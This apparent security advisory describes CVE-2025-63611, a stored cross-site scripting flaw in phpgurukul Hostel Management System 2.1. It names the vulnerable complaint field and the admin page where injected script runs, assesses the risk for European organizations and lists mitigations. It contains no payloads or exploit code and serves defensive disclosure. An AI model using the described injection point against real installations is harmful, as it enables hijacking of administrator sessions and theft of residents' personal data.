CVE-2025-63611 is a stored Cross-Site Scripting (XSS) vulnerability affecting phpgurukul Hostel Management System version 2.1. The vulnerability exists because the application fails to properly sanitize or escape user-supplied input in the complaint submission form, specifically the 'Explain the Complaint' field submitted via /register-complaint.php. When a user submits a complaint containing malicious HTML or JavaScript code, this input is stored in the backend database without adequate encoding. Later, when an administrator accesses the complaint details page (/admin/complaint-details.php?cid=<id>), the stored malicious script is rendered and executed in the administrator’s browser context. This stored XSS attack vector allows an attacker to execute arbitrary scripts with the privileges of the admin user, potentially leading to session hijacking, credential theft, or unauthorized administrative actions. The vulnerability requires an authenticated user to submit the malicious complaint and an administrator to view it, implying limited but significant attack scope. The CVSS 3.1 base score is 8.7, reflecting high severity due to network attack vector, low attack complexity, required privileges (low), user interaction (required), scope change, and high impact on confidentiality and integrity. No patches or public exploits are currently available, but the vulnerability is publicly disclosed and should be addressed promptly. The root cause is a classic CWE-79 (Improper Neutralization of Input During Web Page Generation) issue, highlighting insufficient input validation and output encoding in the web application.

For European organizations using phpgurukul Hostel Management System v2.1, this vulnerability poses a significant risk to administrative account security and the integrity of complaint management data. Successful exploitation can lead to theft of administrator session cookies, enabling attackers to impersonate admins and perform unauthorized actions such as modifying complaint records, accessing sensitive user data, or escalating privileges within the system. This can result in data breaches, loss of trust, and potential regulatory non-compliance under GDPR due to exposure of personal data. Although availability is not directly impacted, the compromise of administrative functions can disrupt operational workflows and incident response capabilities. Given the administrative interface is targeted, organizations with centralized hostel or accommodation management relying on this system are particularly vulnerable. The requirement for an authenticated user to submit malicious input limits exposure but insider threats or compromised user accounts increase risk. The lack of known exploits in the wild suggests a window for proactive mitigation before widespread attacks occur.

To mitigate CVE-2025-63611, organizations should implement multiple layers of defense beyond generic advice: 1) Apply vendor patches or updates as soon as they become available to fix the input sanitization and output encoding flaws. 2) In the absence of patches, implement web application firewall (WAF) rules to detect and block suspicious script payloads in complaint submissions. 3) Enforce strict input validation on the 'Explain the Complaint' field, allowing only safe characters and stripping or encoding HTML tags. 4) Employ output encoding techniques such as HTML entity encoding when rendering user input in the admin interface to prevent script execution. 5) Limit administrative access to trusted networks and use multi-factor authentication to reduce risk of session hijacking. 6) Monitor logs for unusual complaint submissions or admin page accesses indicative of exploitation attempts. 7) Educate administrators to be cautious when opening complaint details from untrusted users. 8) Consider implementing Content Security Policy (CSP) headers to restrict execution of inline scripts in the admin interface. These targeted mitigations will reduce the attack surface and protect sensitive administrative functions.